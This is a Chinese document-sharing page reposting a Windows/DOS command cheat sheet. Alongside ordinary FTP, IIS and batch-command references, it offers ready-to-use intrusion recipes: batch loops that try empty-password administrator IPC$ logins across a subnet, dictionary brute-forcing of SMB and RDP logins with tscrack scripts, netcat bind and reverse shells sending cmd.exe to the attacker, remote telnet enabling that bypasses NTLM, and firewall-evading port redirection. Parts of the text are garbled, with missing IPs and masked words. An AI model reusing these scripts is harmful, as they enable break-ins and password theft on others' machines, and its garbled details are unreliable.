《转载DOS命令下》word版_第1页
《转载DOS命令下》word版_第2页
《转载DOS命令下》word版_第3页
《转载DOS命令下》word版_第4页
《转载DOS命令下》word版_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、.转载 DOS命令 下原文地址:DOS命令下 潇洒无痕REM文本内容在批处理文件中添加注解netsh查看或更改本地网络配置情况#4四:IIS效劳命令:iisreset/reboot重启win2k计算机但有提示系统将重启信息出现iisreset/start或stop启动停顿所有Internet效劳iisreset/restart停顿然后重新启动所有Internet效劳iisreset/status显示所有Internet效劳状态iisreset/enable或disable在本地系统上启用禁用Internet效劳的重新启动iisreset/rebootonerror当启动、停顿或重新启动Inte

2、rnet效劳时,假设发生错误将重新开机iisreset/noforce假设无法停顿Internet效劳,将不会强迫终止Internet效劳iisreset/timeout Val在到达逾时间秒时,仍未停顿Internet效劳,假设指定/rebootonerror参数,那么电脑将会重新开机。预设值为重新启动20秒,停顿60秒,重新开机0秒。FTP命令:后面有详细说明内容ftp的命令行格式为:ftp-v-d-i-n-g主机名-v显示远程效劳器的所有响应信息。-d使用调试方式。-n限制ftp的自动登录,即不使用.netrc文件。-g取消全局文件名。help命令或?命令查看命令说明bye或quit终止

3、主机FTP进程,并退出FTP管理方式.pwd列出当前远端主机目录put或send本地文件名上传到主机上的文件名将本地一个文件传送至远端主机中get或recv远程主机文件名下载到本地后的文件名从远端主机中传送至本地主机中mgetremote-files从远端主机接收一批文件至本地主机mput local-files将本地主机中一批文件传送至远端主机dir或lsremote-directorylocal-file列出当前远端主机目录中的文件.假设有本地文件,就将结果写至本地文件ascii设定以ASCII方式传送文件缺省值bin或image设定以二进制方式传送文件bell每完成一次文件传送,报警提示

4、cdup返回上一级目录close中断与远程效劳器的ftp会话与open对应open hostport建立指定ftp效劳器连接,可指定连接端口delete删除远端主机中的文件mdeleteremote-files删除一批文件mkdir directory-name在远端主机中建立目录renamefromto改变远端主机中的文件名rmdir directory-name删除远端主机中的目录status显示当前FTP的状态system显示远端主机系统类型user user-namepasswordaccount重新以别的用户名登录远端主机open hostport重新建立一个新的连接prompt交互

5、提示形式macdef定义宏命令lcd改变当前本地主机的工作目录,假设缺省,就转到当前用户的HOME目录chmod改变远端主机的文件权限case当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母cd remote-dir进入远程主机目录cdup进入远程主机目录的父目录!在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip cp复制文件mv挪动文件rm文件名删除文件,rm-a目录名删除目录及子目录mkdir目录名建立目录rmdir删除子目录,目录内没有文档。chmod设定档案或目录的存取权限grep在档案中查找字符串diff档案文件比较find档案搜寻dat

6、e如今的日期、时间who查询目前和你使用同一台机器的人以及Login时间地点w查询目前上机者的详细资料whoami查看自己的帐号名称groups查看某人的Group passwd更改密码history查看自己下过的命令ps显示进程状态kill停顿某进程gcc黑客通常用它来编译C语言写的文件su权限转换为指定使用者telnet IP telnet连接对方主机同win2K,当出现bash$时就说明连接成功。ftp ftp连接上某效劳器同win2K附:批处理命令与变量1:for命令及变量根本格式:FOR/参数%variable INsetDO commandcommand_parameters%va

7、riable:指定一个单一字母可交换的参数,如:%i,而指定一个变量那么用:%i,而调用变量时用:%i%,变量是区分大小写的%i不等于%I。批处理每次能处理的变量从%0-%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2-%9指输入的第2-9个值;例:net useipipc$pass/user:user中ip为%1,pass为%2,user为%3set:指定一个或一组文件,可使用通配符,如:D:user.txt和1 12541-1 254,"1 1254"第一个"1"指起始值,第二个"1&quo

8、t;指增长量,第三个"254"指完毕值,即:从1到254;"1-1 254"说明:即从254到1command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:&来隔开command_parameters:为特定命令指定参数或命令行开关INset:指在set中取值;DO command:指执行command参数:/L指用增量形式set为增量形式时;/F指从文件中不断取值,直到取完为止set为文件时,如d:pass.txt时。用法举例:echo off echo用法格式:test.bat*.*.*test.txt

9、for/L%G in1 1254do echo%1.%G test.txt&net use%1.%G/user:*istrator|find"命令成功完成"test.txt存为test.bat说明:对指定的一个C类网段的254个IP依次试建立*istrator密码为空的IPC$连接,假设成功就把该IP存在test.txt中。/L指用增量形式即从1-254或254-1;输入的IP前面三位:*.*.*为批处理默认的%1;%G为变量ip的最后一位;&用来隔开echo和net use这二个命令;|指建立了ipc$后,在结果中用find查看是否有"命令成功完

10、成"信息;%1.%G为完好的IP地址;1 1254指起始值,增长量,结止值。echo off echo用法格式:ok.bat ip FOR/F%i IND:user.dicDO smb.exe%1%i D:pass.dic 200存为:ok.exe说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%i为用户名;%1为输入的IP地址默认。#7七:2:if命令及变量根本格式:IFnoterrorlevel数字命令语句假设程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为"真"。例:IF erro

11、rlevel 0命令指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1命令指程序执行最后返回的值不等于1,就执行后面的命令。0指发现并成功执行真;1指没有发现、没执行假。IFnot字符串1=字符串2命令语句假设指定的文本字符串匹配即:字符串1等于字符串2,就执行后面的命令。例:"if"%2%"="4"goto start"指:假设输入的第二个变量为4时,执行后面的命令注意:调用变量时就%变量名%并加""IFnotexist文件名命令语句假设指定的文件名存在,就执行后面的命令。例:&

12、quot;if not nc.exe goto end"指:假设没有发现nc.exe文件就跳到":end"标签处。IFnoterrorlevel数字命令语句else命令语句或IFnot字符串1=字符串2命令语句else命令语句或IFnotexist文件名命令语句else命令语句加上:else命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else必须与if在同一行才有效。当有del命令时需把del命令全部内容用括起来,因为del命令要单独一行时才能执行,用上后就等于是单独一行了;例如:"if exist test.txt.del te

13、st.txt.else echo test.txt.missing",注意命令中的"."二系统外部命令均需下载相关工具:1、瑞士军刀:nc.exe参数说明:-h查看帮助信息-d后台形式-e prog程序重定向,一旦连接就执行危险-i secs延时的间隔-l监听形式,用于入站连接-L监听形式,连接天闭后仍然继续监听,直到CTR+C-n IP地址,不能用域名-o film记录16进制的传输-p空格端口本地端口号-r随机本地及远程端口-t使用Telnet交互方式-u UDP形式-v详细输出,用-vv将更详细-w数字timeout延时间隔-z将输入,输出关掉用于扫锚时根本

14、用法:nc-nvv 80连接到主机的80端口nc-l-p 80开启本机的TCP 80端口并监听nc-nvv-w2-z 80-1024扫锚的80-1024端口nc-l-p 5354-t-e c:winntsystem32cmd.exe绑定remote主机的cmdshell在remote的TCP 5354端口nc-t-e c:winntsystem32cmd.exe 5354梆定remote主机的cmdshell并反向连接的5354端口高级用法:nc-L-p 8

15、0作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止nc-L-p 80 c:log.txt作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt nc-L-p 80 c:honeyport.txt作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用type.exe c:honeyport|nc-L-p 80作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用本机上用:nc-l-p本机端口在对方

16、主机上用:nc-e cmd.exe本机IP-p本机端口*win2K nc-e/bin/sh本机IP-p本机端口*linux,unix反向连接打破对方主机的防火墙本机上用:nc-d-l-p本机端口要传送的文件途径及名称在对方主机上用:nc-vv本机IP本机端口存放文件的途径及名称传送文件到对方主机备注:|管道命令或重定向命令。"",例如:tlntadmn test.txt指把test.txt的内容赋值给tlntadmn命令表示执行后面的命令,但不会显示出来后台执行;例:dir c:winnt d:log.txt意思是:后台执行dir,并把结果存在d:log.txt中与的区别&

17、quot;"指:覆盖;""指:保存到添加到。如:dir c:winnt d:log.txt和dir c:winnt d:log.txt二个命令分别执行二次比较看:用的那么是把二次的结果都保存了,而用:那么只有一次的结果,是因为第二次的结果把第一次的覆盖了。#8八:2、扫锚工具:xscan.exe根本格式xscan-host起始IP-终止IP检测工程其他选项扫锚"起始IP到终止IP"段的所有主机信息xscan-file主机列表文件名检测工程其他选项扫锚"主机IP列表文件名"中的所有主机信息用法例如tscrack 192.168

18、.0.1-l*istrator-w pass.dic远程用密码字典文件暴破主机的*istrator的登陆密码tscrack -l*istrator-p 123456用密码123456远程登陆的*istrator用户if not exist ipcscan.txt goto noscanfor/f"tokens=1 delims="%i in3389.txtdo call hack.bat%i nscanecho 3389.txt no find or scan faild存为3389.bat假设现有用SuperScan或其它扫锚器

19、扫到一批开有3389的主机IP列表文件3389.txt3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.batif not exist tscrack.exe goto noscantscrack%1-l*istrator-w pass.dic rouji.txt:noscanecho tscrack.exe no find or scan faild存为hack.bat运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了hack.bat意思是:运行tscrack

20、.exe用字典暴破3389.txt中所有主机的*istrator密码,并将破解结果保存在rouji.txt文件中。5、其它:Shutdown.exe ShutdownIP地址t:20 20秒后将对方NT自动关闭Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。fpipe.exeTCP端口重定向工具在第二篇中有详细说明端口重定向绕过防火墙fpipe-l 80-s 1029-r 80 sina .cn当有人扫锚你的80端口时,他扫到的结果会完全 sina .cn的主机信息Fpipe-l 23-s 88-

21、r 23目的IP把本机向目的IP发送的23端口Telnet恳求经端口重定向后,就通过88端口发送到目的IP的23端口。与目的IP建立Telnet时本机就用的88端口与其相连接然后:直接Telnet 本机IP就连接到目的IP的23端口了。OpenTelnet.exe远程开启telnet工具opentelnet.exeIP帐号密码ntlm认证方式Telnet端口不需要上传ntlm.exe破坏微软的身份验证方式直接远程开启对方的telnet效劳后,就可用telnetip连接上对方。NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,假设失败,再使用用户名和密码

22、;2:只使用NTLM身份验证。ResumeTelnet.exeOpenTelnet附带的另一个工具resumetelnet.exeIP帐号密码用Telnet连接完对方后,就用这个命令将对方的Telnet设置复原,并同时关闭Telnet效劳。#10十:6、FTP命令详解:FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵敏应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。假设你想学习使用进展后台FTP下载,那么就必须学习FTP指令。FTP的命令行格式为:ftp-v-d-i-n-g主机名,其中-v显示远程效劳器的所有响应信息;-n限制ftp的自动登录,即不使用;.n etr

23、c文件;-d使用调试方式;-g取消全局文件名。FTP使用的内部命令如下中括号表示可选项:1.!cmdargs:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 2.$macro-ameargs:执行宏定义macro-name。3.accountpassword:提供登录远程系统成功后访问系统资源所需的补充口令。4.append local-fileremote-file:将本地文件追加到远程系统主机,假设未指定远程系统文件名,那么使用本地文件名。5.ascii:使用ascii类型传输方式。6.bell:每个命令执行完毕后计算机响铃一次。7.bin:使用二进制文件传输方

24、式。8.bye:退出ftp会话过程。9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。10.cd remote-dir:进入远程主机目录。11.cdup:进入远程主机目录的父目录。12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。13.close:中断与远程效劳器的ftp会话与open对应。14.cr:使用asscii方式传输文件时,将回车换行转换为回行。15.delete remote-file:删除远程主机文件。16.debugdebug-value:设置调试方式,显示发送至远程

25、主机的每条命令,如:deb up 3,假设设为0,表示取消debug。17.dirremote-dirlocal-file:显示远程主机目录,并将结果存入本地文件。18.disconnection:同close。19.form format:将文件传输方式设置为format,缺省为file方式。20.get remote-filelocal-file:将远程主机的文件remote-file传至本地硬盘的local-file。21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。22.hash:每传输1024字节,显示一个hash符号#。23

26、.helpcmd:显示ftp内部命令cmd的帮助信息,如:help get。24.idleseconds:将远程效劳器的休眠计时器设为seconds秒。25.image:设置二进制传输方式同binary。26.lcddir:将本地工作目录切换至dir。27.lsremote-dirlocal-file:显示远程目录remote-dir,并存入本地文件local-file。28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义完毕。29.mdeleteremote-file:删除远程主机文件。30.mdir remote-files local-file:与di

27、r类似,但可指定多个远程文件,如:mdir*.o.*.zipoutfile。31.mget remote-files:传输多个远程文件。32.mkdir dir-name:在远程主机中建一目录。33.mls remote-file local-file:同nlist,但可指定多个文件名。34.modemodename:将文件传输方式设置为modename,缺省为stream方式。35.modtime file-name:显示远程主机文件的最后修改时间。36.mput local-file:将多个文件传输至远程主机。37.newer file-name:假设远程机中file-name的修改时间比

28、本地硬盘同名文件的时间更近,那么重传该文件。38.nlistremote-dirlocal-file:显示远程主机目录的文件清单,并存入本地硬盘的local-file。39.nmapinpattern outpattern:设置文件名映射机制,使得文件传输时,文件中的某些字符互相转换,如:nmap.,.,那么传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。40.ntransincharsoutchars:设置文件名字符的翻译机制,如ntrans1R,那么文件名LLL将变为RRR。41.open hostport:建立指定ftp效劳器连接,可指定连

29、接端口。42.passive:进入被动传输方式。43.prompt:设置多个文件传输时的交互提示。44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp效劳器,以在两个效劳器间传输文件。第一条ftp命令必须为open,以首先建立两个效劳器间的连接。45.put local-fileremote-file:将本地文件local-file传送至远程主机。46.pwd:显示远程主机的当前工作目录。47.quit:同bye,退出ftp会话。48.quote arg1,arg2.:将参数逐字发至远程ftp效劳器,如:quote syst.49.recv remote-filelocal-file:同get。50.reget remote-filelocal-file:类似于get,但假设local-file存在,那么从上次传输中断处续传。51.r

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论